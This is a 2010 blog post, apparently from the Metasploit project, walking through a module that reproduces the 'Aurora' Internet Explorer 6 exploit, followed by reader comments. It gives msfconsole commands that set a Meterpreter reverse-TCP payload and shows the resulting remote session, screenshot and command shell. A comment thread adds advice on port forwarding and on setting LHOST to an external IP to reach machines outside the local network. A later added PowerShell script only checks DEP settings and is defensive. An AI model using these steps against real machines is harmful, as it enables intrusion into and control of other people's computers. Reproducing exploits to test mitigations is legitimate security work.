Friday, January 15, 2010

Reproducing the "Aurora" IE Exploit

Update: This module, just like the original exploit, only works on IE6 at this time. IE7 requires a slightly different method to reuse the object pointer and IE8 enables DEP by default.

Yesterday, a copy of the unpatched Internet Explorer exploit used in the Aurora attacks was uploaded to Wepawet. Since the code is now public, we ported this to a Metasploit module in order to provide a safe way to test your workarounds and mitigation efforts.

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync the latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the following commands:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > screenshot aurora.bmp
meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>
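A check a defender can run on a Windows test host before trying this module, as an added example that is not from the original post: it reports the system DEP policy, the mitigation the update at the top credits with stopping the module on IE8. It reads the Win32_OperatingSystem WMI class through Get-WmiObject (available on PowerShell 2.0, so it works on the XP SP3 hosts used above); the policy-code meanings are the documented Windows values, not something the post states.

```powershell
# Added example, not code from the original post.
# Report the host's DEP policy via WMI. The post says IE8 enables DEP by
# default, while the IE6 target used in the walkthrough has no such protection.
$os = Get-WmiObject -Class Win32_OperatingSystem

# Documented meanings of DataExecutionPrevention_SupportPolicy.
$policyNames = @{
    0 = 'AlwaysOff (DEP disabled system-wide)'
    1 = 'AlwaysOn  (DEP enforced for every process)'
    2 = 'OptIn     (only Windows binaries and processes that opt in)'
    3 = 'OptOut    (all processes except those explicitly excluded)'
}

$policy = [int]$os.DataExecutionPrevention_SupportPolicy
Write-Output ("DEP hardware support: {0}" -f $os.DataExecutionPrevention_Available)
Write-Output ("DEP policy:           {0}" -f $policyNames[$policy])
Write-Output ("DEP for 32-bit apps:  {0}" -f $os.DataExecutionPrevention_32BitApplications)

# Under OptIn only processes that opt in themselves are covered. The post
# states IE8 does this by default; assumption: IE6 and IE7 do not, so on an
# OptIn host they are only protected if the policy is raised to OptOut/AlwaysOn.
if ($policy -eq 0) {
    Write-Warning "DEP is off system-wide; the IE8 crash-but-no-shell result reported above would not hold here."
} elseif ($policy -eq 2) {
    Write-Warning "OptIn: IE6/IE7 are not DEP-protected unless they opt in. Consider OptOut or AlwaysOn."
}
```

Run it on the same machine you point the browser at; comparing its output with whether you get a crash or a session is a quick way to confirm DEP is actually the control in play.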

19 comments:

Anonymous said...

Failed on IE 6 on Windows 2003 SP1
failed on IE 8 on Windows 7 RC1

Medt said...

Fast Update. Thanks For Penetration Tools

Anonymous said...

thanks. i tried it with xp sp3 and ie7. seems not to work properly. the browser crashes though.

Anonymous said...

seems not to work with ie7

dandart said...

Doesn't seem to work with IE8/XPSP3 - it just crashes the tab.

Par said...

IE6 running on XP SP3 with the following patches missing is invulnerable to your exploit:

Security Update for Windows XP (KB972270)
Windows Malicious Software Removal Tool - January 2010 (KB890830)
Cumulative Security Update for Internet Explorer 6 for Windows XP (KB976325)
Security Update for Windows XP (KB974318)
Security Update for Windows XP (KB974392)
Update for Windows XP (KB955759)
Security Update for Windows XP (KB973904)
Update for Windows XP (KB973687)
Update for Windows XP (KB976098)
Security Update for Windows XP (KB969947)
Microsoft .NET Framework 2.0 Service Pack 2 Security Update for Windows 2000, Windows Server 2003, and Windows XP (KB974417)
Cumulative Security Update for ActiveX Killbits for Windows XP (KB973525)
Security Update for Windows Media Format Runtime 9, 9.5 & 11 for Windows XP SP 3 (KB954155)
Security Update for Windows XP (KB975025)
Security Update for Windows XP (KB974571)
Security Update for Windows XP (KB974112)
Security Update for Windows XP (KB971486)
Security Update for Windows XP (KB958869)
Security Update for Windows XP (KB969059)
Security Update for Microsoft XML Core Services 4.0 Service Pack 2 (KB954430)
Update for Windows XP (KB968389)
Security Update for Windows XP (KB956844)
Security Update for Jscript 5.7 for Windows XP (KB971961)
Security Update for Windows Media Format Runtime 9, 9.5 & 11 for Windows XP SP 3 (KB968816)
Security Update for Windows XP (KB971557)
Security Update for Windows XP Service Pack 3 (KB973540)
Security Update for Windows XP (KB973869)
Security Update for Windows XP (KB956744)
Security Update for Windows XP (KB973354)
Security Update for Windows XP (KB973507)
Security Update for Windows XP (KB960859)
Security Update for Windows XP (KB973815)
Security Update for Windows XP (KB971657)
Update to .NET Framework 3.5 Service Pack 1 for the .NET Framework Assistant 1.0 x86 (KB963707)
Security Update for Windows XP (KB961501)
Security Update for Windows XP (KB970238)
Security Update for Windows XP (KB963093)
Security Update for Windows XP (KB923561)
Security Update for Windows XP (KB956572)
Security Update for Windows XP (KB952004)
Security Update for Windows XP (KB960803)
Security Update for Windows XP (KB959426)
Windows Genuine Advantage Notification (KB905474)
Update for Windows XP (KB961118)
Security Update for Microsoft Office Outlook 2007 (KB972363)
Update for Microsoft Office Outlook 2007 Junk Email Filter (KB977839)
Update for Microsoft Office InfoPath 2007 (KB976416)
Office Genuine Advantage Notifications (KB949810)
Security Update for Microsoft Office Excel 2007 (KB973593)
Security Update for the 2007 Microsoft Office System (KB973704)
Security Update for the 2007 Microsoft Office System (KB974234)
Security Update for the 2007 Microsoft Office System (KB972581)
Security Update for Microsoft Office Visio Viewer 2007 (KB973709)
Security Update for Microsoft Office Publisher 2007 (KB969693)
Security Update for the 2007 Microsoft Office System (KB969613)
Security Update for Microsoft Office Word 2007 (KB969604)
Security Update for the 2007 Microsoft Office System (KB969559)
Update for the 2007 Microsoft Office System (KB967642)
Security Update for Microsoft PowerPoint 2007 (KB957789)

Anonymous said...

Does not reproduce on XP SP2 nor SP3.
Tested with both IE6&7

hdm said...

No crash, or no shell?

Crewl-T6 said...

Crashes on:

XP SP3 IE7
XP SP3 IE8

Anonymous said...

XP SP3 with IE7 reproduced nothing... no shell and no crash.

marco000 said...

I was able to get a shell on IE 6/SP2. On IE7 and IE8 with SP2 I was only able to get a crash, even with system wide DEP disabled. SP3 and IE8 also only resulted in crashes, no shell.

Anonymous said...

i wanna test this on a pc outside my network using my friend's pc (w/ his permission of course) so what i did is,

i set the:
* SRVHOST and LHOST to 192.168.1.29 (my local IP)
* SRVPORT to 8080
* portforwarded 4444 and 8080 on my router

but when i gave the link to my friend, it doesn't work. the link i used is http://myexternalip:8080/URIPATH

any ideas guys?

Anonymous said...

XP SP3 IE7 and Win7 IE8 only crashes. no shell.

hdm said...

LHOST would need to be your external IP, not your internal

Anonymous said...

Works only local with internal IP. If I enter my external IP I get: getaddrinfo: Non-recoverable failure in name resolution.
Host is FreeBSD 8

Mapache said...

Works fine with:

Windows XP SP2 (English) and IE6

I had to do it twice. The first time the Browser crashed without creating a session.
The second time it worked as expected.

hdm said...

That is pretty common for heap fill - the first time the heap was already in a state where the target address could not be reached.

John said...

Working on XP(32) SP3 IE6 on second attempt.
Crashed XP(32) IE7.
Crashed Win7(64) IE8.

Thanks for the good work HDM.

John

Anonymous said...

VUPEN released an exploit for IE 8 which bypasses DEP.

http://www.vupen.com/exploits

However, it is not public.